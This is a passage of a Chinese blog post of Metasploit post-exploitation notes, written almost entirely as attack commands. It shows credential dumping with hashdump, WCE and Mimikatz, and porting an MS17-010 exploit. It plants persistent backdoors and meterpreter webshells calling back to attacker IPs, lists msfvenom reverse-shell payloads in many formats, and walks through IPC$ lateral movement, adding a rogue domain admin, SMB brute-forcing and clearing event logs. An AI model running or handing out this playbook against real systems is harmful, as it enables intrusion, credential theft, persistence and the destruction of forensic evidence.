<span class="token function">whoami</span>  <span class="token comment" spellcheck="true"># 查看权限</span>

<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>Hash攻击</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true">###### 1.是使用Hashdump抓取密码</span>
hashdump   <span class="token comment" spellcheck="true"># 导出主机的sam数据库的hash</span>

<span class="token comment" spellcheck="true"># 另一个更强大的模块</span>
run winsows/gather/smart_hashdump  <span class="token comment" spellcheck="true"># 若是win7,且开启了uac，就要使用绕过uac的模块再继续</span>



<span class="token comment" spellcheck="true">##### 2.使用Quarks PwDump抓取密码</span>
win32下的一款工具，导出信息十分全面，支持系统版本十分广泛
具体参数再查
QuarksPwDump.exe -dh1 -o 1.txt
<span class="token comment" spellcheck="true"># 还可配合在 Ntdsutil 工具到处DC的密码</span>

ps: win的密码会加密存放在/windows/system32/config/sam



<span class="token comment" spellcheck="true">##### 3.使用Windows Credentials Editor抓取密码</span>
WCE<span class="token punctuation">(</span>Windows Credentials Editor<span class="token punctuation">)</span>  功能强大，不过必须是管理员权限，还要主要免杀
<span class="token comment" spellcheck="true"># 先上传wce到目标</span>
upload wce.exe
<span class="token comment" spellcheck="true"># 在目标的shell下执行</span>
wce -w  <span class="token comment" spellcheck="true"># 便会成功提取明文管理员密码(默认是-l命令读取，-f强制安全方式读取，-g用来计算密码，-c制定会话来执行cmd，-v显示详细信息，-w最关键 --> 查看已登录的明文密码)</span>



<span class="token comment" spellcheck="true">##### 4.使用Mimikatz抓取密码</span>
msf内置了Mimikatz成为一个peterpreter脚本集成
load Mimikatz
<span class="token function">help</span> Mimikatz
<span class="token comment" spellcheck="true"># mimikatz_command # 可以让我们使用Mimikatz全部功能, 如(:: 请求某个模块可用的选项)</span>
mimikatz_command -f hash::
mcv    <span class="token comment" spellcheck="true"># 抓取系统hash值</span>
kerberos    <span class="token comment" spellcheck="true"># 抓取系统票据</span>
wdigest   <span class="token comment" spellcheck="true"># 获取系统账户信息</span>
mimikatz_command -f samdump::hash  <span class="token comment" spellcheck="true"># 抓取hash</span>

<span class="token comment" spellcheck="true">## mimikatz 除了抓取hash，还有其他功能：比如 Handle模块，list\kill进程，模拟用户令牌等</span>
mimikatz_command -f handle::
mimikatz_command -f service::  <span class="token comment" spellcheck="true"># servvice模块可以对win的服务进行...</span>
mimikatz_command -f crypto::  <span class="token comment" spellcheck="true"># crypto可以列出 导出任何证书，以及存储在目标机器上的相应的私钥</span>

<span class="token comment" spellcheck="true"># mimikatz 也支持PowerShell调用</span>
脚本P228


能在PowerShell中执行mimikatz，偷窃和注入凭证，伪造Kerbero票证创建，还有其他很多功能
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="后渗透攻击：移植漏洞利用代码模块"><a href="#后渗透攻击：移植漏洞利用代码模块" class="headerlink" title="后渗透攻击：移植漏洞利用代码模块"></a>后渗透攻击：移植漏洞利用代码模块</h6><p>支持不同语言编写的模块移植进去，允许开发者开发自己的漏洞利用模块</p>
<p>MS17-010 –&gt; 微软SMB远程代码执行漏洞</p>
<p>演示：移植MS17-010漏洞利用代码</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># MS17-010 在msf中虽然有集成脚本，但是不适用于03系统，从网上自行下载</span>
<span class="token comment" spellcheck="true"># clone脚本到本地，把rb脚本复制到/usr/share/metasploit-framework/modules/exploits/windows/smb下</span>
raload all  <span class="token comment" spellcheck="true"># 然后在msf中重新加载脚本</span>
之后就能search到了，用use加载它
<span class="token comment" spellcheck="true"># 开始</span>
msfovenom 生成一个DLL文件<span class="token punctuation">(</span>在下面set payload<span class="token punctuation">)</span>
然后设置该模块的参数
run



<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="后渗透攻击：后门"><a href="#后渗透攻击：后门" class="headerlink" title="后渗透攻击：后门"></a>后渗透攻击：后门</h6><p>提取完成之后，就需要留后门了  </p>
<p>1.操作系统后门</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true">##### 1.Cymothoa后门</span>
可以将ShellCode注入到现有进程的后门工具
该后门能与被注入进程共存，且如果不检查内存是发现不了的
该后门注入系统的某一进程，返回的是该进程相应的权限<span class="token punctuation">(</span>并不需要root<span class="token punctuation">)</span>， 但是关闭进程或重启，后门就会停止运行

<span class="token function">ps</span> -aux  <span class="token comment" spellcheck="true"># 查看程序的pid， Win下是 tasklist</span>
<span class="token comment" spellcheck="true"># -p指定目标进程的PID，-y指定payload服务端口，-s指定ShellCode编号(cymothoa -S 查看) </span>
cymothoa -p 862 -s 1 -y 5555
<span class="token comment" spellcheck="true"># 连接后门</span>
nc -nvv 192.168.0.112 5555




<span class="token comment" spellcheck="true">##### 2.Persistence后门</span>
使用安装自启动方式的持续型后门，可以用它创建注册表和文件
run persistence -h  <span class="token comment" spellcheck="true"># 查看命令选项</span>
<span class="token comment" spellcheck="true"># 创建持久型后门</span>
run persistence -A -S -U -i 60 -p 4321 -r 162.168.0.112 
<span class="token comment" spellcheck="true"># -A自动启动payload，-S系统启动时自动加载，-U用户登录时自动启动， -X开机时自动加载，-i回连时间间隔，-P监听端口号， -r 目标机器地址</span>

sessions  <span class="token comment" spellcheck="true"># 发现会话已成功获取</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>2.Web后门(WebShell)</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 中国菜刀，AntSword， Cknife， 冰蝎，Weevely(kali使用最多，但是只支持php)，msf也有自带的后门</span>

<span class="token comment" spellcheck="true">##### 1. Meterpreter 后门</span>
msf中有一个叫 php meterpreter 的payload，里哟你他可以创建具有Meterpreter功能的php webshell
<span class="token comment" spellcheck="true"># 使用msfvenom创建一个webshell</span>
msfvenom -p php/meterpreter/reverse_tcp LHOST<span class="token operator">=</span>192.168.0.106 LPORT<span class="token operator">=</span>1234 -f raw <span class="token operator">></span> p.php
<span class="token comment" spellcheck="true"># 上传webshell到目标机器</span>
<span class="token comment" spellcheck="true"># 本机运行 msf multi-handler 开始监听</span>
use exploit/multi/handlers
<span class="token keyword">set</span> payload php/meterpreter/reverse_tcp
<span class="token punctuation">..</span>.
run
<span class="token comment" spellcheck="true"># 访问webshell页面</span>
<span class="token comment" spellcheck="true"># 获得反弹的 Metasploit Shell</span>



<span class="token comment" spellcheck="true">##### 2. Aspx Meterpreter 后门</span>
msf下的 shell_reverse_tcp 的payload，可以创建多个版本的具有meterpreter功能的Shellcode
这里以aspx为例, 步骤和上面的那个大致相同
show payloads
use windows/shell_reverse_tcp
<span class="token keyword">set</span> <span class="token punctuation">..</span>.
save

generate -h  <span class="token comment" spellcheck="true"># 查看帮助</span>
generate -t aspx  <span class="token comment" spellcheck="true"># 生成aspx版本的ShellCode</span>
<span class="token comment" spellcheck="true"># 保存内容到x.aspx，上传到服务器</span>
<span class="token comment" spellcheck="true"># 本地设置监听</span>
use exploit/multi/handlers
<span class="token keyword">set</span> payload windows/meterpreter/reverse_tcp
<span class="token punctuation">..</span>.
run
<span class="token comment" spellcheck="true"># 访问webshell页面</span>
<span class="token comment" spellcheck="true"># 获得反弹的 Metasploit Shell</span>
后续就可以进行提权等操作了
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<hr>
<h4 id="msf基础命令"><a href="#msf基础命令" class="headerlink" title="msf基础命令"></a>msf基础命令</h4><pre class="line-numbers language-bash"><code class="language-bash">search ms17  <span class="token comment" spellcheck="true"># 查找</span>
use exploit/multi/handler    <span class="token comment" spellcheck="true"># 使用</span>
info    <span class="token comment" spellcheck="true"># 查看信息</span>
show expoits/payloads/options    <span class="token comment" spellcheck="true"># 显示可用信息</span>
exploit /run    <span class="token comment" spellcheck="true"># 执行</span>
back    <span class="token comment" spellcheck="true"># 返回上一级</span>
exploit -j     <span class="token comment" spellcheck="true"># 后台运行</span>
sessions    <span class="token comment" spellcheck="true"># 查看当前可用会话</span>
session -i 1  <span class="token comment" spellcheck="true"># 连接某个会话</span>
sessions -K    <span class="token comment" spellcheck="true"># 杀死所有活跃会话</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="Meterpreter命令："><a href="#Meterpreter命令：" class="headerlink" title="Meterpreter命令："></a>Meterpreter命令：</h4><pre class="line-numbers language-bash"><code class="language-bash">getuid    <span class="token comment" spellcheck="true"># 查看用户名，从而查看当前会话具有的权限</span>
sysinfo    <span class="token comment" spellcheck="true"># 列出主机信息</span>
getprivs    <span class="token comment" spellcheck="true"># 尽可能多地获取目标主机上的特权</span>
getystem    <span class="token comment" spellcheck="true"># 通过各种攻击向量来提升到系统用户权限</span>
hashdump    <span class="token comment" spellcheck="true"># 导出目标主机中的口令哈希值</span>
screenshot    <span class="token comment" spellcheck="true"># 屏幕截图</span>
background    <span class="token comment" spellcheck="true"># 将当前的meterpreter shell转为后台执行</span>
quit    <span class="token comment" spellcheck="true"># 关闭当前meterpreter会话，回到msf终端</span>

<span class="token function">ps</span>    <span class="token comment" spellcheck="true"># 显示所有运行进程</span>
migrate PID    <span class="token comment" spellcheck="true"># 迁移到制定的进程PID</span>
execute -f cmd.exe -i  <span class="token comment" spellcheck="true"># 执行cmd.exe命令并进行交互</span>
shell    <span class="token comment" spellcheck="true"># 以所有可用令牌来进行一个交互的shell</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="msfvenom基础"><a href="#msfvenom基础" class="headerlink" title="msfvenom基础"></a>msfvenom基础</h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 参考：msf下的各种生成payload命令  http://www.cnblogs.com/backlion/p/6000544.html</span>
<span class="token comment" spellcheck="true">### 二进制</span>
<span class="token comment" spellcheck="true"># Linux</span>
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f elf <span class="token operator">></span> shell.elf

<span class="token comment" spellcheck="true"># Windows 生成exe程序</span>
msfvenom -p windows/meterpreter/reverse_tcp LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f exe <span class="token operator">></span> shell.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost<span class="token operator">=</span>192.168.0.105 lport<span class="token operator">=</span>4444 -f exe -o /var/www/html/payload.exe

<span class="token comment" spellcheck="true"># Mac</span>
msfvenom -p osx/x86/shell_reverse_tcp LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f macho <span class="token operator">></span> shell.macho


<span class="token comment" spellcheck="true">### Web Payloads</span>
<span class="token comment" spellcheck="true"># PHP</span>
msfvenom -p php/meterpreter_reverse_tcp LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f raw <span class="token operator">></span> shell.php
<span class="token function">cat</span> shell.php <span class="token operator">|</span> pbcopy <span class="token operator">&amp;&amp;</span> <span class="token keyword">echo</span> <span class="token string">'&lt;?php '</span> <span class="token operator">|</span> <span class="token function">tr</span> -d <span class="token string">'\n'</span> <span class="token operator">></span> shell.php <span class="token operator">&amp;&amp;</span> pbpaste <span class="token operator">>></span> shell.php

<span class="token comment" spellcheck="true"># ASP</span>
msfvenom -p windows/meterpreter/reverse_tcp LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f asp <span class="token operator">></span> shell.asp

<span class="token comment" spellcheck="true"># JSP</span>
msfvenom -p java/jsp_shell_reverse_tcp LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f raw <span class="token operator">></span> shell.jsp

<span class="token comment" spellcheck="true"># WAR</span>
msfvenom -p java/jsp_shell_reverse_tcp LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f war <span class="token operator">></span> shell.war


<span class="token comment" spellcheck="true">### Scripting Payloads</span>
<span class="token comment" spellcheck="true"># Python</span>
msfvenom -p cmd/unix/reverse_python LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f raw <span class="token operator">></span> shell.py

<span class="token comment" spellcheck="true"># Bash</span>
msfvenom -p cmd/unix/reverse_bash LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f raw <span class="token operator">></span> shell.sh

<span class="token comment" spellcheck="true"># Perl</span>
msfvenom -p cmd/unix/reverse_perl LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f raw <span class="token operator">></span> shell.pl


<span class="token comment" spellcheck="true">### Shellcode:</span>
<span class="token comment" spellcheck="true"># Linux Based Shellcode</span>
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f <span class="token operator">&lt;</span>language<span class="token operator">></span>

<span class="token comment" spellcheck="true"># Windows Based Shellcode</span>
msfvenom -p windows/meterpreter/reverse_tcp LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f <span class="token operator">&lt;</span>language<span class="token operator">></span>

<span class="token comment" spellcheck="true"># Mac Based Shellcode</span>
msfvenom -p osx/x86/shell_reverse_tcp LHOST<span class="token operator">=</span><span class="token operator">&lt;</span>Your IP Address<span class="token operator">></span> LPORT<span class="token operator">=</span><span class="token operator">&lt;</span>Your Port to Connect On<span class="token operator">></span> -f <span class="token operator">&lt;</span>language<span class="token operator">></span>


<span class="token comment" spellcheck="true">### Handler</span>
use exploit/multi/handler
<span class="token keyword">set</span> PAYLOAD <span class="token operator">&lt;</span>Payload name<span class="token operator">></span>
<span class="token keyword">set</span> LHOST <span class="token operator">&lt;</span>LHOST value<span class="token operator">></span>
<span class="token keyword">set</span> LPORT <span class="token operator">&lt;</span>LPORT value<span class="token operator">></span>
<span class="token keyword">set</span> ExitOnSession <span class="token boolean">false</span>
exploit -j -z
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="反弹Shell"><a href="#反弹Shell" class="headerlink" title="反弹Shell"></a>反弹Shell</h4><pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true">### 第一种(这个监听更综合一点)： use exploit/multi/hander</span>
<span class="token comment" spellcheck="true"># 1.msfvenom生成程序</span>
<span class="token comment" spellcheck="true"># 2.使用handler执行exp</span>
<span class="token comment" spellcheck="true"># 3.在目标机器运行msfvenom生成程序</span>
<span class="token comment" spellcheck="true"># 4.返回session</span>



<span class="token comment" spellcheck="true">### 第二种： use exploit/multi/script/web_delivery</span>
<span class="token comment" spellcheck="true"># 1.使用web_delivery返回脚本执行并加载exp</span>
<span class="token comment" spellcheck="true"># 2.在目标机器运行脚本</span>
<span class="token comment" spellcheck="true"># 3.返回session</span>

<span class="token comment" spellcheck="true"># Note: 这里要使用的payload与上面使用生成器生成的名字要一致</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<hr>
<h2 id="一些小思路"><a href="#一些小思路" class="headerlink" title="一些小思路"></a>一些小思路</h2><h4 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h4><p>当拿下第一天内网主机的权限(提权不了时)，就要以此服务器为跳板攻击其他服务器</p>
<p>先进行网络/用户组/DC等的收集</p>
<h6 id="获取另外一台服务器权限"><a href="#获取另外一台服务器权限" class="headerlink" title="获取另外一台服务器权限"></a>获取另外一台服务器权限</h6><p><strong>若权限不够导致不能直接攻击域服务器</strong></p>
<ul>
<li>使用meterpreter当前拥有的权限添加到内网路由，进行弱口令扫描</li>
<li>用Powershell对内网进行扫描</li>
<li>架设Socks4a, 然后socks会自动进行内网扫描</li>
<li>利用当前权限进行内网IPC$渗透</li>
<li>其他</li>
</ul>
<p>通过分析，我们输入<code>net view</code>, 发现列举的机器选择一个和我们机器名相似的服务器试，成功率一般很高<code>net use \\WIN7_TEST2\c$</code></p>
<p>使用经典的<code>IPC$入侵</code>（通过win默认启动的ipc共享来获得计算机控制权）：</p>
<pre class="line-numbers language-bash"><code class="language-bash">net use \192.168.0.112\ipc$   <span class="token comment" spellcheck="true"># 连接这个ip的ipc共享</span>
copy srv.exe \192.168.0.112\ipc$  <span class="token comment" spellcheck="true"># 复制srv(免杀的payload)到目标</span>
net <span class="token function">time</span> \192.168.0.112  <span class="token comment" spellcheck="true"># 查看时间</span>
at \192.168.0.112 18:18 srv.exe    <span class="token comment" spellcheck="true"># 用at命令在18点18分启动srv.exe (这里设置的时间要比主机时间快)</span>
<span class="token comment" spellcheck="true"># 如果没有 at命令，试试新的计划任务命令： schtask </span>
<span class="token comment" spellcheck="true"># 回到msf的handler进行监听，到时间会反弹shell</span>
然后进入这个新的主机，查看包括权限在内的信息, 也可以mimikatz抓密码: run /post/windows/gather/mimikatz
也可以上传对应位数的mimikatz到该主机 upload /home/x64.exe c:\
shell    <span class="token comment" spellcheck="true"># 进入到目标的shell，再执行</span>

<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="Powershell寻找域管在线服务器"><a href="#Powershell寻找域管在线服务器" class="headerlink" title="Powershell寻找域管在线服务器"></a>Powershell寻找域管在线服务器</h4><p>使用<code>PowerView</code>脚本的<code>Invoke-User Hunter</code>上传到目标机器，然后执行<code>Invoke-UserHunter</code></p>
<pre class="line-numbers language-bash"><code class="language-bash">powershell.exe -exec bypass -Command <span class="token string">"&amp;{Import-Module .powerview.ps1;Invoke-UserHunter}"</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>找到域管理员当前在线登录的主机后，入侵该主机，然后把它迁移到域管理员登录所在的进程，这样就有了域管的理的权限</p>
<h4 id="获取域管权限"><a href="#获取域管权限" class="headerlink" title="获取域管权限"></a>获取域管权限</h4><p>渗透域控</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 先尝试</span>
getsystem
getuid  <span class="token comment" spellcheck="true">#查看当前用户，因为之前知道这账户的域管理员</span>
<span class="token function">ps</span>    <span class="token comment" spellcheck="true"># 找到域管理所在进程</span>
migrate 30560 <span class="token comment" spellcheck="true"># 迁移进程过去(也可以用msf中窃取令牌的功能)</span>
<span class="token comment" spellcheck="true"># 查看主域控的IP</span>
shell    <span class="token comment" spellcheck="true"># 先进去cmd</span>
net <span class="token function">time</span>
<span class="token comment" spellcheck="true"># 使用IPC$入侵来返回一个域控的meterpreter shell(操作见上面的步骤)</span>
net user <span class="token function">test</span> test123 /ad /domain <span class="token comment" spellcheck="true"># 添加域管理员</span>
net group <span class="token string">"domain admins"</span> /domain  <span class="token comment" spellcheck="true">#查看域管理员是否添加成功</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="登录域控"><a href="#登录域控" class="headerlink" title="登录域控"></a>登录域控</h4><p>下面要登录域控，抓取hash</p>
<p>常见的登录域控的方法：</p>
<pre class="line-numbers language-bash"><code class="language-bash">- 利用IPC上传AT<span class="token operator">&amp;</span>Achtasks远程执行命令
- 利用端口转发或Socks登录DC的3389
- 登录对方内网一台主机使用PsTools工具包中的PsExec来反弹shell
- 使用msf下的PsExec，psexec_psh, Impacket psexec, pth-winexe, Empire Invoke-Psexec等PsExec类工具反弹shell
- 使用msf下的smb_login反弹shell
- 使用WMI来进行攻击
- 使用PsRemoting posershel远程执行命令
- 其他
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>最常见的是msf下的PsEcex反弹meterpreter(1.msf下的PsEcex模块   2.cuestom模块,建议使用Veil之类的工具来生成免杀的payload)</p>
<pre class="line-numbers language-bash"><code class="language-bash">use /exploit/windows/smb/psexec
<span class="token keyword">set</span> smbuser <span class="token function">test</span>
<span class="token keyword">set</span> smbpass test123
<span class="token keyword">set</span> smbdomain HACKER
<span class="token keyword">set</span> rhost 192.168.0.111
run
<span class="token comment" spellcheck="true"># 获得反弹的meterpreter shell之后，先迁移进程，查看DC的系统系统和sesssion控制图</span>
<span class="token function">ps</span>
migrate 2166
getuid
sysinfo
sessions    <span class="token comment" spellcheck="true"># 查看我们获取的sessions</span>

<span class="token comment" spellcheck="true"># 抓hash方法：</span>
- msf自带的hashdump<span class="token punctuation">(</span>有system权限才可以<span class="token punctuation">)</span>或smart_dump模块导出用户的Hash
- 使用PowerShell的相应模块导出hash
- 使用WCE、Mimikatz等工具
- 其他
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="SMB爆破内网"><a href="#SMB爆破内网" class="headerlink" title="SMB爆破内网"></a>SMB爆破内网</h4><p>有了DC的密码，接下来只需快速在内网扩大控制权限</p>
<ul>
<li>利用当前获取的DC的账户密码，对整个域控的IP短进行扫描</li>
<li>使用SMB下的smb_login模块</li>
<li>端口转发或socks代理进内网</li>
</ul>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true">## 先在msf添加路由，然后使用smb_login模块Huo psexec_Scanner模块进行爆破</span>
background
route add 192.168.0.115 255.255.255.0  2    <span class="token comment" spellcheck="true"># 目的是访问1192.168.0.115将通过meterpreter的会话 2 来访问：</span>
search smb_login
use auxiliary/scanner/smb/smb_login
<span class="token keyword">set</span> <span class="token punctuation">..</span>.
run

<span class="token comment" spellcheck="true"># 扫描内网</span>
creds  <span class="token comment" spellcheck="true"># 然后获得大量内网服务器的密码，下面就可以畅游内网了</span>

<span class="token comment" spellcheck="true"># 可以使用Meterpreter的端口转发，也可以使用Metasploit下的Socks4a模块或第三方软件(这里使用简单的第一种)</span>
portfwd add -l 5555 -p 3389 -r 127.0.0.1
background
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="清理日志"><a href="#清理日志" class="headerlink" title="清理日志"></a>清理日志</h4><p><strong>步骤</strong></p>
<ul>
<li>删除之前添加的域管理员的帐号</li>
<li>删除所有在渗透中使用的工具</li>
<li>删除应用程序、系统和安全日志</li>
<li>关闭所有的Meterpreter连接</li>
</ul>
<pre class="line-numbers language-bash"><code class="language-bash">net user <span class="token function">test</span> /dels
clearev    <span class="token comment" spellcheck="true"># 删除日志</span>
sessions
sessions -K <span class="token comment" spellcheck="true"># 关闭所有msf连接</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://www.xpshuai.cn" rel="external nofollow noreferrer">剑胆琴心</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://www.xpshuai.cn/posts/48093/">http://www.xpshuai.cn/posts/48093/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="http://www.xpshuai.cn" target="_blank">剑胆琴心</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Metasploit/">
                                    <span class="chip bg-color">Metasploit</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
